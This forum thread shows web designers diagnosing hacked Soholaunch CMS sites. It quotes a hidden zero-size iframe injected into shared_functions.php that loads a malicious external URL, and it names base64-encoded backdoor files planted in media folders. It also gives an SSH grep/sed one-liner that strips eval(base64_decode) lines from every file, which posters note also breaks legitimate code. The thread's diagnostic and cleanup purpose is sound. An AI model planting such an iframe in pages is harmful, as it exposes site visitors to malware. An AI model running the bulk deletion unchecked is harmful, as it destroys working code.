Jump to content


Photo
- - - - -

"Trojan Horse"


  • Please log in to reply
34 replies to this topic

#1 lwyau

lwyau

    a soho enthusiast

  • Moderators
  • 5,605 posts

Posted 13 April 2007 - 05:24 PM

Two of my clients told me that their customers told them that their websites "having trojan horse". Presumably the end users anti virus softwares were alerting them when accessing either site. Both are, of course, solo sites.

The thing is that I cannot see any such alert on my computers (windows xp with McAfee anti virus) and running sohoscan.php did not reveal any problems, either.

Has anyone else encountered this?

#2 ianc13

ianc13

    Member

  • Members
  • PipPip
  • 11 posts

Posted 14 April 2007 - 11:40 PM

I have found amongst my friends and clients that it all depends on what virus protection program you use, and how often it is updated. I use Norton Corporate on 2 of my pc's and AVG free edition on the others. Both these programs pick up different things, and also false detect Trojans when they are actually cookies with a refresh function on them (ie:shopping cart cookies). I would ask your clients for more information on what was found, and what program found them, possibly it was even a spyware checker program and the problem is a temp directory related one. Of course it is possible that someone has placed a trojan redirect code through the site, but unikley if your scan did not pick it up.
- ianc13 - Aus Health Info

#3 george

george

    Advanced Member

  • Members
  • PipPipPip
  • 36 posts

Posted 15 April 2007 - 10:44 PM

its the helpmehelpyou.php file that is probably being detected.


its been reported as setting off anti virus programs but i believe it is still being included in the builds...

George Callaghan
 


#4 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 11 June 2010 - 11:21 AM

I know this thread is pretty old, but one of my clients is having tha same trouble and it's happened twice now.
On every page is this:

<body>
<iframe src="http://googlestat.org/stat/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
</body>

(The first time it was a different url in the iframe)

I've traced the source of this code to shared_functions.php where it appeared once at the beginning of the regular php code, before the 'proper code' begins, and today it appears after the last ?>

I double checked the .htaccess file against another unhacked site and found distinc difference - ie: it was almost non existent, so uploaded a modified version of that to the hacked site.

Now... my question is: where is this vulnerability occurring? Any ideas peeps?
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#5 dresswell

dresswell

    Soho Dog

  • Administrators
  • 3,417 posts
  • LocationU.S.A.

Posted 11 June 2010 - 12:36 PM

Hi Dr jon,
We missed you around here.

I found the same thing on a site today for someone im helping here today.
I have not figured out yet how they got there yet.
dresswell

 Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others

and were disappointed with your host or there support.
Get the help you need to build your website today.

Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker


#6 busi6292

busi6292

    Senior Member

  • Members
  • 137 posts

Posted 11 June 2010 - 02:11 PM

I too have got the same problem and Soholaunch don't seem to want to be made aware of the problem unless I pay for support.

Can you let me know where the shared_functions.php file is please so I can temporarily fix the problem. I will have to switch my clients to a new CMS one by one asap with this major problem - it has resulted unfortunately in the sites being blacklisted now on Google.

If anyone knows where the vulnerabilty has occured, I too would like to know please.

Thanks.

#7 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 11 June 2010 - 02:37 PM

I can confirm two of my sites had the exact same thing. Look in the shared_functions.php file in sohoadmin/program/includes

Also, look for a photo.php or photos.php file in your media folder, it will be completely encoded.

What versions are you all running? I was running the latest on mine.

Are any of you using any plugins too? I have two different plugins both by the same company on both of my sites. Those were the similarities between the two.

#8 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 11 June 2010 - 02:48 PM

One more thing, that Mike Morrison at Soho sent me the other day - http://www.soholaunc...ia/sohoscan.zip

It's very useful.

#9 dresswell

dresswell

    Soho Dog

  • Administrators
  • 3,417 posts
  • LocationU.S.A.

Posted 11 June 2010 - 03:57 PM

I have also seen these in the media folder.
Page.php, 404.php.
Looks like a eval(base64).

Heres how to remove it.
Got this from draknet.

Log in with ssh and run this command:

for file in $(grep "eval(base64_decode(" -lir *); do sed -i 's/eval(base64_decode(.*));//g' $file; done;

It will strip out that line from any file that has it (including ones that should, so be careful using this).

dresswell

 Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others

and were disappointed with your host or there support.
Get the help you need to build your website today.

Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker


#10 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 11 June 2010 - 04:15 PM

Problem with that one is that there seems to be many lines of code with the base64 encoding code......

I just downloaded the entire site locally and did a 'find in files' command to locate the offending code.

Still unsure of how the exploit works though - although I did find that in the shopping directory the email to friend php file had both the ownership entirely removed as well as having no permissions whatsoever. Tried chmodding it to no avail and had to remove it from server and upload a good version from another Soho site.

Could be just a coincidence.. who knows?

Anyone? :geek:

Edit: If they get listed on Google as blacklisted (as my client did) as soon as you clean up the site you can request that they do another scan of the site - you need an account --> webmaster tools...

I'd hang fire on using another CMS until you know how the exploit was carried out: if one piece of software can be hacked, then so might another.....

Edited by DrJon, 11 June 2010 - 04:27 PM.

The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#11 dresswell

dresswell

    Soho Dog

  • Administrators
  • 3,417 posts
  • LocationU.S.A.

Posted 11 June 2010 - 04:41 PM

I have been using this for a few months now on a bunch of soho sites.
What i do is run the installsoholaunch.php after the ssh command.
Seams to do the trick.
dresswell

 Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others

and were disappointed with your host or there support.
Get the help you need to build your website today.

Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker


#12 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 11 June 2010 - 04:53 PM

I'm guessing that if you don't have the ability to log in with ssh, or are nervous about running command line instructions, then the sohoscan.php -> delete these files -> installsoholaunch.php should achieve the same result.
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#13 dresswell

dresswell

    Soho Dog

  • Administrators
  • 3,417 posts
  • LocationU.S.A.

Posted 11 June 2010 - 05:06 PM

I have not tried it that way but i would think it would work also.
dresswell

 Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others

and were disappointed with your host or there support.
Get the help you need to build your website today.

Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker


#14 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 11 June 2010 - 05:06 PM

I just use the sohoscan to do the dirty work for me, I only deleted files I knew weren't supposed to be there. I agree on the grep command, a lot of files use base64 and plugins do too. I wouldn't want someone to just go in and delete everything.

As for the email a friend file... this little bugger has been causing issues since day 1, but I'm pretty sure when I was reading about changes in one of the last revisions, Soho said they had pretty much fixed all the issues with it.

I'm tempted to write a plugin that just eliminates it. I never have it turned on for any of my client's sites and ask them not to use it.

#15 busi6292

busi6292

    Senior Member

  • Members
  • 137 posts

Posted 11 June 2010 - 05:45 PM

Interesting to read everyone's replies.

I removed the code fom the shared_functions.php file relating to that iframe. I also removed something called photo.php in the media folder which was base64 encoded..it's quite scary seeing someone elses user name and password in tha file too..does anyone know what all of this did or what was suppose to do to the site? I assume it was an automated script that targeted multiple sites?

Thanks Dr Jon for the info, I will ask for a rescan of the site in Webmaster Tools - wasn't aware you could do that there.

#16 Mike Morrison

Mike Morrison

    Administrator

  • Administrators
  • 10 posts

Posted 11 June 2010 - 06:20 PM

Hey Everybody,

Two points to mention here...
1. There were some exploits in older builds, but we have corrected them. Make sure you're running the latest version (as of right now v4.9.3 r38+).

2. sohoscan.php is your best friend for investigating hacks...
http://www.soholaunc...ia/sohoscan.zip

Please let us know via support ticket if you've cleaned a site, updated to v4.9.3 r38+ and THEN get hacked again (pointing to an outstanding vulnerability).

#17 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 11 June 2010 - 06:39 PM

I deleted my copies of the encoded script, but if someone has one saved, I can run it on my mac while it's not connected to a network and decode it to see if I can follow the code. PM me if you have a copy you want to send.

#18 kyle04

kyle04

    Senior Member

  • Moderators
  • 411 posts

Posted 15 June 2010 - 12:00 PM

Reminds me when I was hacked a while ago - the sohoscan.php script did identify eval(gzinflate(base64_decode( encoded scripts which I removed as no soho script is encoded this way. There were 2 or 3 of this type in a variety of locations (including image folders, shopping folder, template folders). Names to be wary of include :

ini.php
function.php
prod_cust_card.php
thumb.php

They were all remote ftp programmes - not a good thing to have in your site !

AndyP

#19 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 21 June 2010 - 02:17 PM

Well... it's happened again to the same site - latest version, nothing untoward about the site at all, just a regular site.

The code was again attached to the end of the shared functions file so I've removed it and set the chmod to no write mode - we'll see if this makes a difference. :suspicious:
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#20 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 21 June 2010 - 10:17 PM

Have you checked the FTP logs to see if anyone not recognized is getting in?

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users